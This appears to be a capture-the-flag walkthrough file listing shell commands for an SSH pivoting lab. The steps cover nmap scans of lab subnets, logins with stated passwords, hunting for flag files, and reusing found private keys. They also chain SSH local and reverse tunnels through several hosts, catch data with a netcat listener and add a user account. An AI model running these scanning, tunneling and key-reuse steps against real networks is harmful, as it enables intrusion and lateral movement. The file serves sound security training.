main
Raw Download raw file

NICE_TO_HAVE

bchd

apt update
apt install -y man less
unminimize

STEPS

bchd

cd /root
ls -al
cat /root/flag.txt # So, you're finally awake
apt update
apt install -y nmap
nmap -p 1337 -sV 200.200.200.1/24
ssh root@200.200.200.252 -p 1337
# password: pawn

redirector

cat /root/flag.txt # Into the Unknown
find / -type f -name *.txt
find / -type f -name *flag*
cat /tmp/flag.txt # Contact lens
exit

bchd

ssh-keygen -y -f /map.txt
ssh root@200.200.200.252 -p 1337 -NfL 127.0.0.1:2111:200.200.200.111:22
ss -antp | grep 2111
ssh -i /map.txt admin@127.0.0.1 -p 2111 # Opening Moves
# TODO: proxychains nmap line to scan for port 2222 on server_1
ssh -i /map.txt admin@127.0.0.1 -p 2111 -NfL 127.0.0.1:2222:172.16.2.31:2222
ss -antp | grep 2222
# create file on bchd with provided key called wshaibel
ssh wshaibel@127.0.0.1 -p 2222 -i wshaibel # Novice Tournamanet

server_1

cat /etc/ssh/sshd_config | grep GatewayPorts # Novice - Game 1
file evidence_found_lens.enc # it's a zip!
base64 evidence_found_lens.enc
exit

bchd

# copy back the b64 cotents to bchd to file evidence_found_lens.enc.b64
base64 -d evidence_found_lens.enc.b64 > evidence_found_lens.enc
apt install unzip
unzip evidence_found_lens.enc
# Password 123456
cat evidence_found_lens.txt # Novice - Game 3
ssh wshaibel@127.0.0.1 -p 2222 -i wshaibel -NfR 0.0.0.0:1031:127.0.0.1:1031 #1031-1225
ps aux | grep ssh # note the 1031 process id
apt install -y netcat
nc -nvl 1031 | tee game-2.txt
# within 60s data should be received - Novice - Game 2
# remove the flag from game-2.txt
chmod 0400 game-2.txt
ssh-keygen -y -f game-2.txt
ssh wshaibel@127.0.0.1 -p 2222 -i wshaibel -NfL 127.0.0.1:22109:10.10.10.109:22
ss -antp | grep 22109
ssh hmelling@127.0.0.1 -p 22109 -i game-2.txt # Expert Tournament
adduser vborgov
su vborgov
cd ~
mkdir .ssh
vim ~/.ssh/authorized_keys
# add provided key
exit
apt install -y openssh-server rsyslog
/etc/init.d/ssh start
/etc/init.d/ssh stop
/usr/sbin/sshd -D -d
ssh hmelling@127.0.0.1 -p 22109 -i game-2.txt -NfR 0.0.0.0:1666:127.0.0.1:22
ps aux | grep ssh
# watch for inbound connection
# new file should be uploaded via scp
ssh-keygen -y -f /home/vborgov/id_rsa
ssh hmelling@127.0.0.1 -p 22109 -i game-2.txt -NfL 127.0.0.1:22201:192.168.200.201:22
ss -antp | grep 22201
ssh bharmon@127.0.0.1 -p 22201 -i /home/vborgov/id_rsa